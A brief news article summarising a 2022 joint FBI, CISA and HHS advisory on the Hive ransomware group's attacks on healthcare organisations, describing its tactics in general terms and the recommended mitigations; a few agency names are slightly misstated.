On November 17, 2022, the Federal Bureau of Investigation (FBI), the Department for Health and Human Services (DHSS) and the Cybersecurity and Infrastructure Agency (CISA) have together issued a warning to the Health and Public Sector (HPH) over the increased risk of ransomware attacks. This comes after a sustained period of attacks between June 2021 and November 2022, when the Hive Ransomware Group carried out attacks on more than 1,300 organizations across the world. The total value of the ransoms paid during these attacks was $100 million.
The Hive Ransomware Group, which operates as a ransomware-as-a-service (RaaS) model, conducted attacks on the public healthcare system in Costa Rica, and the US-based Lake Charles Memorial Health System, Missouri Delta Medical Center, Memorial Health System and Partnership HealthPlan of California. As well as costing these organizations a huge amount of money, the attacks also risked patient well-being as the ransomware attacks meant that operations had to be cancelled, urgent care units closed, and ambulances diverted to other hospitals.
The RaaS model means that Hive creates and maintains the malware while affiliates conduct the actual attack. These affiliates can then receive a portion of the ransom that was paid. The attacks have involved double extortion and public release of information if the victims do not release the ransom. This puts patients at risk of identity theft and insurance fraud. Some victims, who have recovered data without actually paying the ransom, are then re-attacked.
Often, attacks are launched by exploiting vulnerabilities in the Remote Desktop Protocol (RDPs) or by compromising Virtual Private Networks (VPNs). The victims can also be targeted via phishing attacks, or by explicitly targeting unpatched vulnerabilities in servers (such as Microsoft Exchange Server vulnerabilities CVE-2021-31207, CVE-2021-34473, CVE-2021-34523).
After accessing an organization’s network, the affiliate launching the malware attack can identify how back-ups are stored, what antivirus software is being used, how files are copied etc.. It can then interfere with those processes. Shadow copy services are stopped and all copies deleted, event logs are deleted (specifically the System, Security, and Application logs in Windows), virus definitions are removed and standard antivirus programs are disabled. Sensitive patient data is exfiltrated using Rclone; it is this data that is then held to ransom. The affiliate group chats in “real-time” with the victim, explaining their demands.
More detail of the attacks, as well as the FBI’s, CISA’s and DHSS’ advice, can be found here. They recommend mitigating the potential effects of an attack by verifying that Hive no longer has access to the network, ensuring operating systems are up to date, and implementing multi-factor authentication where possible.